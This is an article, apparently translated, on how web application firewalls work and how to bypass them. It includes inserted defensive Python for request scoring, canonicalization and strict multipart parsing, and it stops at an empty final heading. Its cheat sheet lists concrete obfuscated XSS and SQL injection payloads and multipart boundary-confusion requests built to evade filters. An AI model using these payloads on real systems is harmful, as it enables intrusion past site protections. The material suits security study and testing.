
Contents
- Introduction
- What is a modern WAF?
- Identifying the WAF
- WAF bypass cheat sheet
- Bypassing a WAF in practice
- Conclusion
This article turned out to be rather long, so technical specialists who have no interest in a discussion of why WAFs are used, and who do not need the WAF mechanisms explained, can go straight to the bypass techniques and the practical examples.
Introduction
WAFs have become very popular recently: vendors offer many solutions in different price categories, with packages and options for every kind of customer, from small businesses to large corporations. Modern WAFs are popular because they are seen as a comprehensive tool for protecting web applications that covers a wide range of tasks, which lets web application developers shift some security problems onto them. However, such a solution cannot guarantee absolute protection.

So what does a WAF do that justifies deploying it in a real project? Its main function is to detect and block requests in which its analysis has traced some anomaly, or a specific attack vector. Such analysis must not interfere with the interaction of legitimate users with the web application, and at the same time it must detect attempted attacks accurately and in time. To implement this, WAF developers usually use regular expressions, tokenizers, behavioural analysis, reputation analysis and machine learning, and often all of these technologies are used together. In addition, a WAF can provide other functions: protection against DDoS, blocking of attackers' IP addresses, tracking of suspicious IP addresses, adding security headers (X-XSS-Protection, X-Frame-Options and so on), adding the httpOnly flag to cookies, implementing the HSTS mechanism, and adding CSRF tokens. Some WAFs also have a built-in client-side module written in JavaScript.
Of course, a WAF creates many difficulties for hackers and pentesters. Unless the attacker knows an effective 0-day way to bypass the specific WAF, detecting and exploiting vulnerabilities becomes a far more time-consuming task, and using automated scanners against a WAF-protected web application is almost useless. A WAF reliably protects a site at least from script kiddies. However, an experienced specialist or a hacker with sufficient motivation may well decide that it is worth spending the time to look for a bypass. Besides, the more complex and feature-rich a web application is, the larger its attack surface and the easier it is to find a way around the WAF.
Recently we have come across different WAFs quite often during audits, and several of those cases are described below. We have already tested several proprietary WAFs in two main scenarios:
- we know a specific vulnerability in the web application and are trying to get around the WAF in order to exploit it;
- the vulnerability is unknown, and the task is to detect it regardless of the WAF, then bypass the WAF and exploit it.
But first, let us look more closely at the basic mechanisms of a WAF and at the problems they have.
What is a modern WAF?
To find the different ways of bypassing a WAF effectively, a specialist needs to understand the modern mechanisms of request classification. Every WAF is individual and has its own internal structure, but there are several typical methods used for the analysis. Let us look at them.

Regular expression rules
Most existing WAFs are based on regular expression rules. To create them, the WAF developers study a set of well-known attacks and identify the key syntactic constructions whose presence may indicate an attack. Based on those results, regular expressions are written that can find such constructions. It all sounds simple, but this approach has several drawbacks. The scope of a regular expression is limited to a single request, and often to a specific request parameter, which clearly reduces the effectiveness of such rules and creates many blind spots for this mechanism. Second, because a construction can be replaced by an equivalent one, because of the complicated logic of text protocols, and because of the different ways characters can be represented, mistakes are made when such rules are written. There is an excellent study of this topic by Vladimir Ivanov.
Score building
Anyone interested in how firewalls and antivirus products are designed should know this mechanism. By itself it does not detect attacks, but it complements the other methods and makes them more accurate and flexible. The reason it exists is that the mere presence of a "suspicious" construction in a request is not a sufficient condition for detecting an attack, and on the contrary leads to many false positives. The problem is solved by introducing a point system: for example, each regex-based rule is supplemented with information about how significant its match is. After all the triggered rules have been identified, their significance is summed up, and if a certain threshold is exceeded, an attack is detected and the request is blocked. Despite its simplicity, this mechanism has proved itself in this class of tasks and is used everywhere.
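As an added illustration of the score-building mechanism just described (example code written for this edit, not code from the original article or any vendor's product), the block below sums the weights of the regex rules that match a parameter value and blocks once a threshold is reached. The rule set, the weights and the threshold are constructed for the example; a real WAF ships hundreds of tuned rules.

```python
import re

# Each rule: (name, compiled regex, weight).  Rules and weights are constructed
# for this example; the point is how weights accumulate, not the patterns.
RULES = [
    ("sql_union_select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S), 5),
    ("sql_comment", re.compile(r"(/\*.*?\*/|--|#)", re.S), 2),
    ("sql_sleep", re.compile(r"\bsleep\s*\(", re.I), 4),
    ("single_quote", re.compile(r"'"), 1),
    ("html_tag", re.compile(r"<\s*[a-z]", re.I), 2),
    ("js_event_handler", re.compile(r"\bon[a-z]+\s*=", re.I), 4),
    ("js_alert", re.compile(r"\b(alert|confirm|prompt)\s*\(", re.I), 3),
]
THRESHOLD = 5  # constructed: a summed weight at or above this blocks the request


def score_request(value):
    """Return (total_score, [names of triggered rules]) for one parameter value."""
    total = 0
    hits = []
    for name, pattern, weight in RULES:
        if pattern.search(value):
            total += weight
            hits.append(name)
    return total, hits


def verdict(value, threshold=THRESHOLD):
    """'block' when the accumulated score reaches the threshold, else 'allow'.

    A lone single quote scores 1 and is allowed (a name like O'Reilly must not
    be blocked), which is exactly why a lone quote is such a useful probe
    against WAF-protected applications later in this article."""
    total, _ = score_request(value)
    return "block" if total >= threshold else "allow"


if __name__ == "__main__":
    for sample in ["O'Reilly", "1 UNION SELECT version(), user() --", "<svg/onload=alert(1)>"]:
        print(repr(sample), score_request(sample), verdict(sample))
```

The trade-off is visible in the rule table: a `#` alone is worth 2 points so that a CSS colour such as `#fff` passes, while a UNION/SELECT pair plus a comment marker adds up to 7 and is blocked.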
Tokenizers
At Black Hat 2012 this approach to attack detection was presented as the libinjection library, written in C/C++, which makes it possible to detect SQL injection attacks quickly and accurately. At the moment there are ports of libinjection for various programming languages, including PHP, Lua and Python. In essence, the mechanism comes down to searching for signatures represented as a sequence of tokens. A number of signatures are added to a built-in blacklist and are considered invalid or malicious. In other words, before a request is analysed it is first reduced to a set of tokens. Tokens are divided into types such as variable, string, regular operator, unknown, number, comment, union-like operator, function, comma and so on. One of the main drawbacks of this method is that it is possible to build a construction that causes the tokens to be formed incorrectly, so that the signature of the request differs from what is expected. Such constructions are usually called token breakers, and we will return to them later.
Behavioural analysis
Detecting attempts to exploit vulnerabilities in request parameters is not the only task of a WAF. It is also important to identify the procedure of searching for vulnerabilities itself, which shows up as scanning attempts, directory brute-forcing, parameter fuzzing and the other vulnerability-detection methods that automated tools frequently use. More advanced WAFs know how to build "typical" request chains for normal user behaviour and block attempts to send requests in an order that differs from the standard one. This mechanism not only counters attacks but also complicates the process of finding vulnerabilities. A limit on the number of requests per minute does not affect an ordinary user, but it is a serious obstacle for a scanner running in several threads.
Reputation analysis
Another mechanism inherited directly from firewalls and antivirus products. Today almost every WAF includes lists of addresses of VPN services, anonymizers, Tor network nodes and botnet members, which can be used to block requests from suspicious addresses. More advanced WAFs can update their databases automatically and add new entries based on the traffic they analyse.
Machine learning
One of the most controversial topics around WAFs. This mechanism is the hardest to describe, and there are many reasons for that. First, it is worth noting that the very concept of "machine learning" is extremely broad and in practice covers many technologies and techniques; moreover, "machine learning" is considered only one class of AI methods. "Implementing" machine learning, or "using AI", is a very popular marketing move. It is often unclear which methods and algorithms are actually used, and from the attacker's side machine learning in a WAF sometimes looks like nothing more than a nice phrase. Among the market players who have genuinely mastered the full power of machine learning, few are willing to share their experience. All this makes for a rather sad picture for an "outsider" trying to understand the subject. Nevertheless, based on the information that is available, we will try to highlight at least a few sound ideas.
First, machine learning depends entirely on the data it is trained on, and this is often a big problem. The developing company needs an up-to-date and complete collection of existing attacks and the ways they are applied, which is quite difficult. That is why many vendors carefully record the results of their WAFs and cooperate with other companies that offer IDS and SIEM systems in order to get access to real attack examples. Second, a model trained on a "spherical web application in a vacuum" may simply turn out to be useless when installed in front of a real client web application. To get the best effect, it is considered correct to carry out additional training of the model at the stage of deploying the WAF at the client, which requires extra cost, time and organisational effort and still does not guarantee the best result.
Identifying the WAF
WAF developers take different approaches to warning the user that the WAF has blocked a request. Therefore, by analysing the responses to attack requests, one can determine exactly which WAF protects the web application. The term "WAF fingerprint" is often used for this. Fingerprinting is useful when a WAF has for some reason not been updated (this usually applies to open-source WAFs); the big WAF vendors take care of their customers and implement automatic update mechanisms. And even when the WAF is identified and turns out to be updated to the latest version, knowing which WAF it is helps to learn a little about the details of how it works.
The main places where a WAF can be identified are:
- additional cookies;
- headers added to the response or the request;
- the content of the response (when the request is blocked);
- the response code (when the request is blocked);
- the IP address (cloud WAFs);
- a JS module (client-side WAF).
For clarity, here are a few examples.
PT AF
Block response code: 403
The waf.js client module may be embedded in the response page
Block response body:
<h1>Forbidden</h1> <pre>Request ID: 2017-07-31-13-59-56-72BCA33A11EC3784</pre>
Additional header added by waf.js:
X-RequestId: cbb8ff9a-4e91-48b4-8ce6-1beddc197a30
Nemesida
Block response code: 403
Block response body:
<p style="font-size: 16px; align: center;"> Suspicious activity detected. Access to the site is blocked. If you think that is's an erroneous blocking, please email us at <a href="mailto:nwaf@pentestit.ru">nwaf@pentestit.ru</a> and specify your IP-address. </p>
Wallarm
Block response code: 403
Additional header: nginx-wallarm
Citrix NetScaler AppFirewall
Additional cookies:
ns_af=31+LrS3EeEOBbxBV7AWDFIEhrn8A000; ns_af_.target.br_%2F_wat=QVNQU0VTU0lP TklEQVFRU0RDU0Nf?6IgJizHRbTRNuNoOpbBOiKRET2gA
Mod_Security version 2.9
Block response code: 403
Block response body:
<head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /form.php on this server.<br /></p>
Mod_Security version < 2.9
Block response code: 406 or 501
Block response body:
the response body contains "mod_security", "Mod_Security" or "NOYB".
Varnish firewall
Adds new headers to the response:
X-Varnish: 127936309 131303037. X-Varnish: 435491096 Via: 1.1 varnish-v4
WAF developers decide for themselves which response code to return when a request is blocked, and some codes are quite specific. For example, Web_Knight WAF returns code 999 when a request is blocked, and dotDefender returns code 200 with an empty response body or an error message.
Also, do not forget that a WAF, like any other application, is developed and changes, so it is important to keep checking that the known "fingerprints" are still relevant. Moreover, the developers can create a custom response page with different content for blocked requests.
WAF bypass cheat sheet
The general idea behind finding a way to bypass a WAF is to bring the required request into a form that the attacked web application still understands but that the WAF does not understand, or considers harmless. It is important to note that one WAF may have to serve many different types of servers, including exotic ones such as Unicorn, Tornado, Weblogic or Lighttpd. Each server may parse HTTP requests differently and may recognise different exceptional cases, and the WAF has to account for all of them. An attacker can therefore use the details of how the attacked server parses HTTP requests in order to find a way to bypass the WAF.

It is hard to classify all the possible ways of bypassing a WAF by the protection mechanism they defeat or by their area of application: the same bypass can affect several WAF components at once. It is also worth considering the large field of possible applications of detection-bypass techniques, both per attack type and per specific place in the application. The techniques described below were collected from open sources and discovered in the course of our own research, and have proved to be among the most effective. Our thanks to Bo0oM and to the Telegram channel.
Adding special characters
Various special characters may violate the WAF's logic while still being understood by the server itself. Variations of special characters are plentiful: they can be converted to urlencode (although most WAFs have dealt with this for a long time) or to other encodings. Special characters can also be inserted into the request in raw form, without any encoding, which is unexpected for a WAF. For example, \r\n\r\n in this form may be recognised as the end of the HTTP request body, and a null byte can usually break the regular expressions and the parser logic for various data formats. The first 20 characters of the ASCII table and other special characters are useful.
Examples of useful special characters:
- 0x00 - null byte;
- 0x0D - carriage return;
- 0x0A - line feed;
- 0x0B - vertical tab;
- 0x09 - horizontal tab;
- 0x0C - form feed (new page).
When searching for a bypass, it is useful to insert special characters in different places in the request body, not just inside parameter values. For example, if the request is in JSON format, a null byte can be inserted both at the beginning and at the end of the JSON, inside one of the parameters and between parameters. The same applies to other formats of the POST request body. In general, we recommend "having fun" with various special characters in order to find places that the WAF cannot check or parse.
Examples:
{"id":1337,"string0x00":"test' or sleep(9)#"}
{"id":1337,"string":"test'/*0x00*/ or sleep(9)#"}
{"id":1337,"string"0x0A0x0D:"test' or sleep(9)#"}
<a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>
<a 0x00 href="javascript:alert(1)">clickme</a>
<svg/0x00/onload="alert(1)">
id=1337/*0x0C*/1 UNION SELECT version(), user() --
For clarity, the special characters are replaced with their hexadecimal notation.
Whitespace replacement
Replacing spaces with equivalent characters deserves a category of its own. For example, in most syntaxes keywords and operators are separated by whitespace, but the syntax does not strictly specify which character to use. Therefore, instead of the usual 0x20 (space), 0x0B (vertical tab) or 0x09 (horizontal tab) can be used. This category also includes replacing whitespace with separating constructions that carry no semantic load. For example, in SQL these are /**/ (a multi-line SQL comment), #\r\n (a single-line SQL comment ending with a newline) and --\r\n (an alternative single-line SQL comment ending with a newline). Here are some examples:
http://test.com/test?id=1%09union/**/select/**/1,2,3
http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3
An expression can also be rewritten using the language syntax so that spaces are not needed at all. For example, in SQL parentheses can be used:
UNION(SELECT(1),2,3,4,5,(6)FROM(Users)WHERE(login='admin'))
and in JS the / character:
<style/onload=confirm(1)>
Changing the encoding
This method is based on using various encodings so that the WAF does not decode the data in certain places. For example, after one character is replaced with its URL code, the WAF may not realise that the data needs to be decoded and will let the request through, while the same parameter is accepted and successfully decoded by the web application.
Decimal notation of HTML characters: &#106 or &#0000106. The WAF may know the short representation of the character but not the variant with added zeros; the total number of digits must not exceed 7. Similarly, the hexadecimal representation of HTML characters: &#x6A or &#x000006A.
There is also a trick of escaping some characters with the \ character. Example:
<svg/on\load=a\lert(1)>
However, this depends on how the web application handles such input. That is, the character sequence \l is interpreted as an escaped l and converted into a single character, while the WAF may treat each character separately, so the keyword is not visible to it. With this technique the characters \n, \r and \t cannot be escaped, because they are converted into completely different characters: line feed, carriage return and tab.
HTML encoding can also be used inside tag attributes. Examples:
<a href="javascript:alert&lpar;1&rpar;">clickme</a>
<input/onmouseover="javascript:confirm&lpar;1&rpar;">
Instead of these characters, it is entirely possible to substitute other HTML representations of the target characters; various character conversion options can be found here.
In addition to HTML encoding, characters can be inserted using \u:
<a href="javascript:\u0061lert(1)">Clickme</a>
<svg onload=confir\u006d(1)>
Let us also touch on a vector related to the insertion of special characters. Let us break the payload with HTML encoding!
<a href="ja&Tab;vas&NewLine;cript:alert(1)">clickme</a>
In this case, other separator characters can also be substituted.
Therefore, we recommend combining different encodings with other methods, for example in order to encode special characters.
Searching for atypical equivalent syntactic constructions
This method means finding a way of operating that the WAF developers may not have taken into account, or a vector that is missing from the machine learning training set. As simple examples we can name some JavaScript objects and functions: this, top, self, parent, frames; tag properties: data-bind, ontoggle, onfilterchange, onbeforescriptexecute, onpointerover, srcdoc; and SQL statements: lpad, field, bit_count.
Examples:
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
A representation of JavaScript expressions that uses no alphanumeric characters at all can also be used.
The obvious problem with this form of JS is the length of the resulting payload.
Separately, note that bypassing a WAF with this technique depends on the specific attack and the technology stack in use. An example is the situation with the sensational ImageTragick exploit.
To protect against this attack, most WAFs blacklisted the keywords url, capacity and label, which were used in most of the articles and PoCs describing the vulnerability. However, it soon became clear that other keywords, such as ephemeral and pango, could be used in addition to these. As a result, the WAF could be bypassed by using these keywords in the vector.
HTTP Parameter Pollution (HPP) and HTTP Parameter Fragmentation (HPF)
An HPP attack uses the way a server handles parameters with the same name. Possible WAF bypasses:
- the server uses the last parameter received, while the WAF checks only the first one;
- the server joins the values of all parameters with the same name, while the WAF checks them individually.
The differences in how various servers handle parameters with the same name can be compared using the following table.
[Table: handling of same-name parameters by different servers]
An HPF attack, in turn, is based on the fact that if the logic of the web application combines two or more parameters from the request, an attacker can split the request into parts and thereby bypass some WAF checks.
An example of such an attack is a SQL injection of the following form:
http://test.com/url?a=1+select&b=1+from&c=base
HPF and HPP are very similar attacks, but where the first targets the web application, the second targets the environment in which it runs. Using these techniques together raises the chances of bypassing the WAF even further.
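As an added example (written for this edit, not code from the original article or any WAF), the block below shows three "views" of one decoded query string that an inspector needs in order not to be split by HPP or HPF: each value on its own, same-name values joined in arrival order, and all values concatenated in request order. The query strings and the deliberately narrow shape check are constructed for the example.

```python
import re
from urllib.parse import parse_qsl

# Constructed inputs: the HPF request shape from the article, a same-name (HPP)
# variant of the same fragments, and a benign query for contrast.
HPF_QUERY = "a=1+select&b=1+from&c=base"
HPP_QUERY = "id=1&id=+select&id=+from+base"
BENIGN_QUERY = "q=select+a+book&page=2"

# A narrow check, used only to make the effect of each view visible.
SELECT_FROM = re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S)


def parsed(query):
    """Decode the query the way a typical form parser does ('+' becomes space)."""
    return parse_qsl(query, keep_blank_values=True)


def per_value(query):
    """View 1: each value alone, which is all a naive inspector looks at."""
    return [v for _, v in parsed(query)]


def per_name_joined(query):
    """View 2: same-name values joined in arrival order (HPP join semantics)."""
    joined = {}
    for name, value in parsed(query):
        joined[name] = joined.get(name, "") + value
    return joined


def whole_request_joined(query):
    """View 3: every value concatenated in order, which is what an application
    that builds one string out of several parameters effectively sees (HPF)."""
    return " ".join(v for _, v in parsed(query))


def inspect(query):
    """Names of the views in which the shape check fired.

    An inspector that only runs view 1 misses both the HPP and the HPF
    variants; running all three over the same decoded request closes the gap."""
    fired = []
    if any(SELECT_FROM.search(v) for v in per_value(query)):
        fired.append("per_value")
    if any(SELECT_FROM.search(v) for v in per_name_joined(query).values()):
        fired.append("per_name_joined")
    if SELECT_FROM.search(whole_request_joined(query)):
        fired.append("whole_request_joined")
    return fired


if __name__ == "__main__":
    for q in (HPF_QUERY, HPP_QUERY, BENIGN_QUERY):
        print(q, "->", inspect(q))
```

Which join character the application uses (comma, space, nothing) is server-specific, which is exactly what the table above catalogues; an inspector should build view 2 with the same rule as the server behind it, or with several candidate rules.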
Unicode normalization
Unicode has a feature called Unicode normalization. It exists so that some Unicode characters that look alike can be compared: for example, variant forms of the letter a such as ᵃ have a different code from the plain letter, but after normalization they become the plain letter a and are considered identical. Normalization therefore converts some complex Unicode characters into simpler ones. There is a table listing all possible Unicode characters together with their possible normalizations, and with its help various payloads can be built and combined with other methods. However, this does not work for every web application.
For example, according to that table the characters ＜ and ﹤ can be converted into the character <. Note, however, that the stage at which normalization happens matters: if the application applies HTML encoding after normalization, the < obtained from normalization is probably encoded as &lt;. In another case, the developer did not take this feature into account and failed to encode the Unicode characters, so we get unencoded < and > characters that can be turned into XSS. The WAF, in turn, may have problems understanding Unicode characters, may have no rules for such tricks, and its machine learning may be powerless. When looking for WAF bypasses in a web application that uses Unicode normalization, not only the <> characters but other characters of the payload can be changed as well.
Example:
＜img src﹦x onerror＝alert︵1)>
Such a problem was recently reported against Rockstar on HackerOne, although there was no WAF there, only strict filtering of user input:
hackerone.com/reports/231444
hackerone.com/reports/231389
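The four techniques above (special characters, whitespace replacement, encoding changes and Unicode normalization) all exploit a gap between what the inspector sees and what the backend eventually decodes. As an added example (written for this edit, not code from the original article or any WAF), the block below canonicalizes a parameter value the way a defender-side inspector should before any regex or token rule looks at it, and runs it over constructed samples modelled on the payload shapes shown in those sections. The sample strings, the decoding order and the `js_unescape` helper are assumptions of the example.

```python
import html
import re
import unicodedata
from urllib.parse import unquote

# Constructed samples modelled on the shapes shown above; raw control bytes are
# written as Python escapes, fullwidth/small forms as \u escapes.
SAMPLES = {
    "whitespace_sql": "id=1%09union/**/select/**/1,2,3",
    "comment_sql": "id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3",
    "null_in_comment": "id=1337/*\x00*/1 UNION SELECT version(), user() --",
    "backslash_escape": "<svg/on\\load=a\\lert(1)>",
    "html_entities": '<a href="javascript:alert&lpar;1&rpar;">clickme</a>',
    "unicode_escape": "<svg onload=confir\\u006d(1)>",
    "fullwidth": "\uff1cimg src\ufe66x onerror\uff1dalert\ufe35" + "1)>",
}

JS_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f", "v": "\v", "0": "\0"}


def js_unescape(s):
    """Resolve backslash escapes as a JS string literal would: \\uXXXX and
    \\xXX become the code point, \\n \\r \\t ... become control characters,
    and any other \\c becomes c (so \\l -> l and \\a -> a)."""
    def repl(m):
        esc = m.group(1)
        if esc[0] == "u" and len(esc) == 5:
            return chr(int(esc[1:], 16))
        if esc[0] == "x" and len(esc) == 3:
            return chr(int(esc[1:], 16))
        return JS_ESCAPES.get(esc, esc)
    return re.sub(r"\\(u[0-9a-fA-F]{4}|x[0-9a-fA-F]{2}|.)", repl, s, flags=re.S)


def canonicalize(value):
    """Reduce one parameter value to a canonical form before inspection.

    Order matters: transport encoding first, then content encodings, then
    character-level folding, then the grammar-level separators."""
    v = unquote(value)                             # %xx URL encoding
    v = html.unescape(v)                           # &#106; &#0000106; &#x6A; &lpar; &Tab; ...
    v = js_unescape(v)                             # \u0061 \x61 \l
    v = unicodedata.normalize("NFKC", v)           # fullwidth / small forms -> ASCII
    v = v.replace("\x00", "")                      # null bytes carry no meaning downstream
    v = re.sub(r"/\*.*?\*/", " ", v, flags=re.S)   # /* */ block comments act as separators
    v = re.sub(r"(--|#)[^\r\n]*[\r\n]+", " ", v)   # -- and # line comments up to the newline
    v = re.sub(r"[\t\n\x0b\x0c\r ]+", " ", v)      # every whitespace variant -> one space
    return v.strip()


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:17} {canonicalize(raw)!r}")
```

The last two substitutions are SQL-grammar specific; an inspector that also checks HTML contexts keeps a second canonical view without them, since `#fff` or `--` is harmless text there. The `&Tab;`/`&NewLine;` case collapses to a space rather than disappearing, so a rule for that vector has to match `java script` with separators, which is why canonicalization complements rules rather than replacing them.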
Token breakers
Attacks on tokenization are related to attempts to break the logic of splitting a request into tokens with the help of so-called token breakers. The trick is simple: it influences which token a string element is mapped to, and thereby lets the signature search be bypassed. An example of an attack using a token breaker is the following query:
SELECT-@1,version()
where -@ is the token breaker.
There is a publicly available cheat sheet obtained by fuzzing MySQL and checking the requests with libinjection.
The topic of finding problems in libinjection is no longer new; details can be found here:
- another fuzzer
- article one
- article two
Using RFC features
In the specifications of the HTTP/1.1 protocol and of various request formats (such as multipart/form-data) one can find interesting points related to corner cases or tricks in processing headers and parameters. WAF developers often do not take such points into account, and as a result the WAF parses the request incorrectly and loses the part of the data in which an attack vector may be hidden. Most WAF problems are related to the handling of multipart/form-data and to specific values of the boundary parameter that defines the boundary between the parameters of such a request. In addition, server developers also make mistakes and do not always fully support the specification, so a server's HTTP parser may have undocumented features.
As mentioned above, in an HTTP request using multipart/form-data the boundary parameter serves to separate the different parameters in the request body. According to the RFC, the previously declared boundary, prefixed with "--", is placed before each new POST parameter, which is how the server distinguishes the request parameters.
POST /vuln.php HTTP/1.1
Host: test.com
Connection: close
Content-Type: multipart/form-data; boundary=1049989664
Content-Length: 192

--1049989664
Content-Disposition: form-data; name="id"

287356
--1049989664--
The attack consists in the server and the WAF handling an empty boundary parameter differently. According to the RFC, in this situation the boundary between parameters becomes the character sequence "--". However, the WAF may use a parser that does not take this feature into account, so the data of the POST request parameters never reaches the analyser and the WAF lets the request through, while the web server parses this situation without problems and passes the data on for processing.
POST /vuln.php HTTP/1.1
Host: test.com
Connection: close
Content-Type: multipart/form-data; boundary=
Content-Length: 192

--
Content-Disposition: form-data; name="id"

123' or sleep(20)#
----
Here is another interesting example, taken from Bo0oM's talk at ZeroNights 2016:
POST /vuln.php HTTP/1.1
Host: test.com
Content-Type: multipart/form-data; boundary=FIRST;
Content-Type: multipart/form-data; boundary=SECOND;
Content-Type: multipart/form-data; boundary=THIRD;

--THIRD
Content-Disposition: form-data; name=param

UNION SELECT version()
--THIRD--
In this attack we try to determine which boundary parameter the WAF accepts and which the web server accepts. If the web server and the WAF accept different boundary parameters, the attack can be carried out by specifying the boundary that the WAF does not recognise. This attack is somewhat similar to HPP.
POST /vuln.php HTTP/1.1
Host: test.com
Content-Type: multipart/form-data; xxxboundaryxxx=FIRST; boundary=SECOND;

--FIRST
Content-Disposition: form-data; name=param

UNION SELECT version()
--FIRST--
This attack is designed for another possible difference in how the WAF and the web server parse the HTTP request. The difference has to be the following: the parser on the web server side looks for the first occurrence of "boundary", then looks for the "=" sign and only then determines the value of the boundary, whereas the WAF parser looks only for an occurrence of the string "boundary=" and determines the boundary value from it. If these conditions are met, the WAF, on receiving such a request, cannot find the specified boundary and therefore cannot find and analyse the parameters, while the web server receives the request and processes the parameters. The attack also works when the web server parser looks for "boundary=" and the WAF parser looks only for "boundary"; in that case the real boundary simply has to be changed from FIRST to SECOND.
POST /somepage.php HTTP/1.1
Host: test.com
Content-Type: multipart/form-data; boundary=Test0x00othertext;

--Test
Content-Disposition: form-data; name=param

Attack
--Test--
This attack is also related to adding special characters. A NULL byte is added to the boundary parameter on the assumption that the web server truncates the boundary at the NULL byte while the WAF accepts it as a whole. In this case the WAF again cannot find the boundary and cannot analyse the parameters.
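As an added example (written for this edit, not code from the original article or any WAF), the block below is a strict multipart/form-data boundary parser that refuses each of the ambiguous request shapes discussed above instead of passing them on with "no parameters found". The request samples are constructed to mirror those shapes; the header-list representation and the helper names are assumptions of the example.

```python
import re

# RFC 2046 boundary syntax: 1 to 70 characters from a restricted set.
BOUNDARY_CHARS = re.compile(r"^[0-9A-Za-z'()+_,\-./:=?]{1,70}$")


def parse_content_type(headers):
    """Return the boundary declared by exactly one Content-Type header, or
    None if the request is ambiguous or malformed.  `headers` is a list of
    (name, value) pairs with duplicates preserved."""
    ctypes = [v for n, v in headers if n.lower() == "content-type"]
    if len(ctypes) != 1:
        return None                              # FIRST/SECOND/THIRD shape: refuse
    media, *params = [p.strip() for p in ctypes[0].split(";")]
    if media.lower() != "multipart/form-data":
        return None
    boundary = None
    for p in params:
        if "=" not in p:
            continue
        key, _, val = p.partition("=")
        if key.strip().lower() == "boundary":    # exact key, never a substring match
            if boundary is not None:
                return None                      # two boundary parameters: refuse
            boundary = val.strip().strip('"')
    if boundary is None or not BOUNDARY_CHARS.match(boundary):
        return None                              # empty, NUL byte or otherwise invalid
    return boundary


def parse_multipart(headers, body):
    """Return ('ok', {name: value}) or ('reject', reason).

    The rule modelled here: a body that does not contain the declared delimiter
    is not 'a request with no parameters' but a request whose parameters the
    inspector cannot see, so it is refused rather than passed."""
    boundary = parse_content_type(headers)
    if boundary is None:
        return "reject", "no single valid boundary"
    delim = "--" + boundary
    if delim not in body:
        return "reject", "declared boundary absent from body"
    fields = {}
    for chunk in body.split(delim)[1:]:          # drop the preamble
        if chunk.startswith("--"):
            break                                # closing delimiter reached
        head, sep, value = chunk.lstrip("\r\n").partition("\r\n\r\n")
        if not sep:
            return "reject", "part without header/body separator"
        m = re.search(r'name="?([^";\r\n]+)"?', head)
        if not m:
            return "reject", "part without a name"
        fields[m.group(1)] = value.rstrip("\r\n")
    return "ok", fields


# Constructed requests mirroring the shapes discussed above (body only, CRLF).
GOOD = ([("Host", "test.com"),
         ("Content-Type", "multipart/form-data; boundary=1049989664")],
        '--1049989664\r\nContent-Disposition: form-data; name="id"\r\n\r\n287356\r\n--1049989664--')
EMPTY = ([("Content-Type", "multipart/form-data; boundary=")],
         '--\r\nContent-Disposition: form-data; name="id"\r\n\r\n123\r\n----')
TRIPLE = ([("Content-Type", "multipart/form-data; boundary=FIRST;"),
           ("Content-Type", "multipart/form-data; boundary=SECOND;"),
           ("Content-Type", "multipart/form-data; boundary=THIRD;")],
          "--THIRD\r\nContent-Disposition: form-data; name=param\r\n\r\nx\r\n--THIRD--")
LOOKALIKE = ([("Content-Type", "multipart/form-data; xxxboundaryxxx=FIRST; boundary=SECOND;")],
             "--FIRST\r\nContent-Disposition: form-data; name=param\r\n\r\nx\r\n--FIRST--")
NULBYTE = ([("Content-Type", "multipart/form-data; boundary=Test\x00othertext;")],
           "--Test\r\nContent-Disposition: form-data; name=param\r\n\r\nx\r\n--Test--")

if __name__ == "__main__":
    for label, req in [("good", GOOD), ("empty", EMPTY), ("triple", TRIPLE),
                       ("lookalike", LOOKALIKE), ("nul", NULBYTE)]:
        print(label, parse_multipart(*req))
```

The lookalike case is the instructive one: the parser correctly picks SECOND as the boundary, finds no `--SECOND` in the body and rejects, whereas a parser that answered "zero parts, nothing to inspect" would be the one the article describes being bypassed.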
Bypassing machine learning
The essence of the bypass is obvious: to carry out an attack that fits within the parameters of the trained statistical model. However, a great deal depends on which WAF was trained, and how. Sometimes a hole can be found, and sometimes, as a rule, there is no way in at all. Usually, when a WAF with machine learning is deployed at a client, it needs additional training on the requests received by the client's web application. And here the pentester's problem may be the following: a parameter that always looks the same, or changes little from request to request, cannot be tested in any way, because any step away from the normal form of the parameter may already be recognised as an anomaly. Let us explain with an example.
Suppose there is a request of the form
http://api.test.com/getuser?id=123
in which the id parameter is always a number, and stays a number throughout the training set. If the machine learning module sees anything other than a number in this parameter, it will most likely decide that this is an anomaly. In another case, suppose the WAF has learned to classify POST requests to
http://api.test.com/setMarkDown
with a POST parameter containing markdown. Of course, quotes, special characters and practically anything else can appear in markdown. In this case, bypassing the machine learning module becomes much easier, because the WAF tolerates quotes and special characters.
Below, using an example from practice, we also show that because of parameter-parsing problems caused by the bypasses described above, a request may never reach the machine learning module at all.
In general, one has to take into account the specifics of the request being tested and of its parameters, make assumptions about which variations of parameter values the WAF may tolerate, and start from those.
When is a WAF useless?
A WAF aims to analyse requests and look for anomalous behaviour in them, but there are several classes of vulnerabilities that a WAF cannot detect. These may be logical vulnerabilities, where the request contains nothing anomalous but the actions violate the logic of the web application. A WAF is also likely to be useless for identifying vulnerabilities such as race conditions, IDOR and insecure user authentication.
Existing tools
There are several tools, written by enthusiasts in this field, for automating the search for WAF bypasses.
The most interesting ones worth noting are:
The Lightbulb framework is a complete framework for testing web applications protected by a WAF. It is written in Python and has also been ported as a Burp Suite plugin. Its main features are two algorithms:
- GOFA, an active learning algorithm that can analyse the filtering and sanitization of web application parameters;
- SFADiff, a black-box differential testing algorithm based on learning symbolic finite automata (SFA), which finds differences in the behaviour of web applications and can thereby identify a WAF and find bypasses.
Bypass WAF is a Burp Suite plugin that lets you configure automatic modifications of elements of the request body according to various rules and encoding changes, including automating HPP attacks, without unnecessary effort.
WAFW00F is a WAF identification program written in Python. It has a fairly good base of WAFs and is still supported today, but because the various WAFs are updated much faster than the project itself, the results may still be inaccurate.
Bypassing a WAF in practice

